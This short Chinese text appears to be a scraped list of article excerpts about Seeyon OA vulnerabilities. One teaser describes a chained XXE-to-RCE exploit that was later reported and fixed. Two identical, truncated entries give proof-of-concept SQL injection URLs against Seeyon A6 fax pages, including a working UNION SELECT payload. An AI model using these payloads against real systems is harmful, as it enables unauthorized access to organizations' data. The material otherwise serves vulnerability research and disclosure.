今天跟大家分享一个通过组合漏洞方式来对致远OA进行RCE的案例,整个利用过程分成多个步骤,应该算是XXE漏洞的典型深入应用场景。 在今年8月的某演练活动中笔者利用此漏洞拿到多个目标的边界权限,后续也将该漏洞也报送给了官方,目前已在新版本中修复。本文仅以安全研究为目的,分享对该漏洞的挖掘和分析过程,文中涉及的所有...
A6 - SQL注入 -messageViewer.jsp Date2015类型影响范围复现POC|EXP/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23分析 A6 - SQL注入 -resend.jsp Date2015类型影响范围复现POC|EXP /ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20An...
A6 - SQL注入 -messageViewer.jsp Date2015类型影响范围复现POC|EXP/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23分析 A6 - SQL注入 -resend.jsp Date2015类型影响范围复现POC|EXP /ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20An...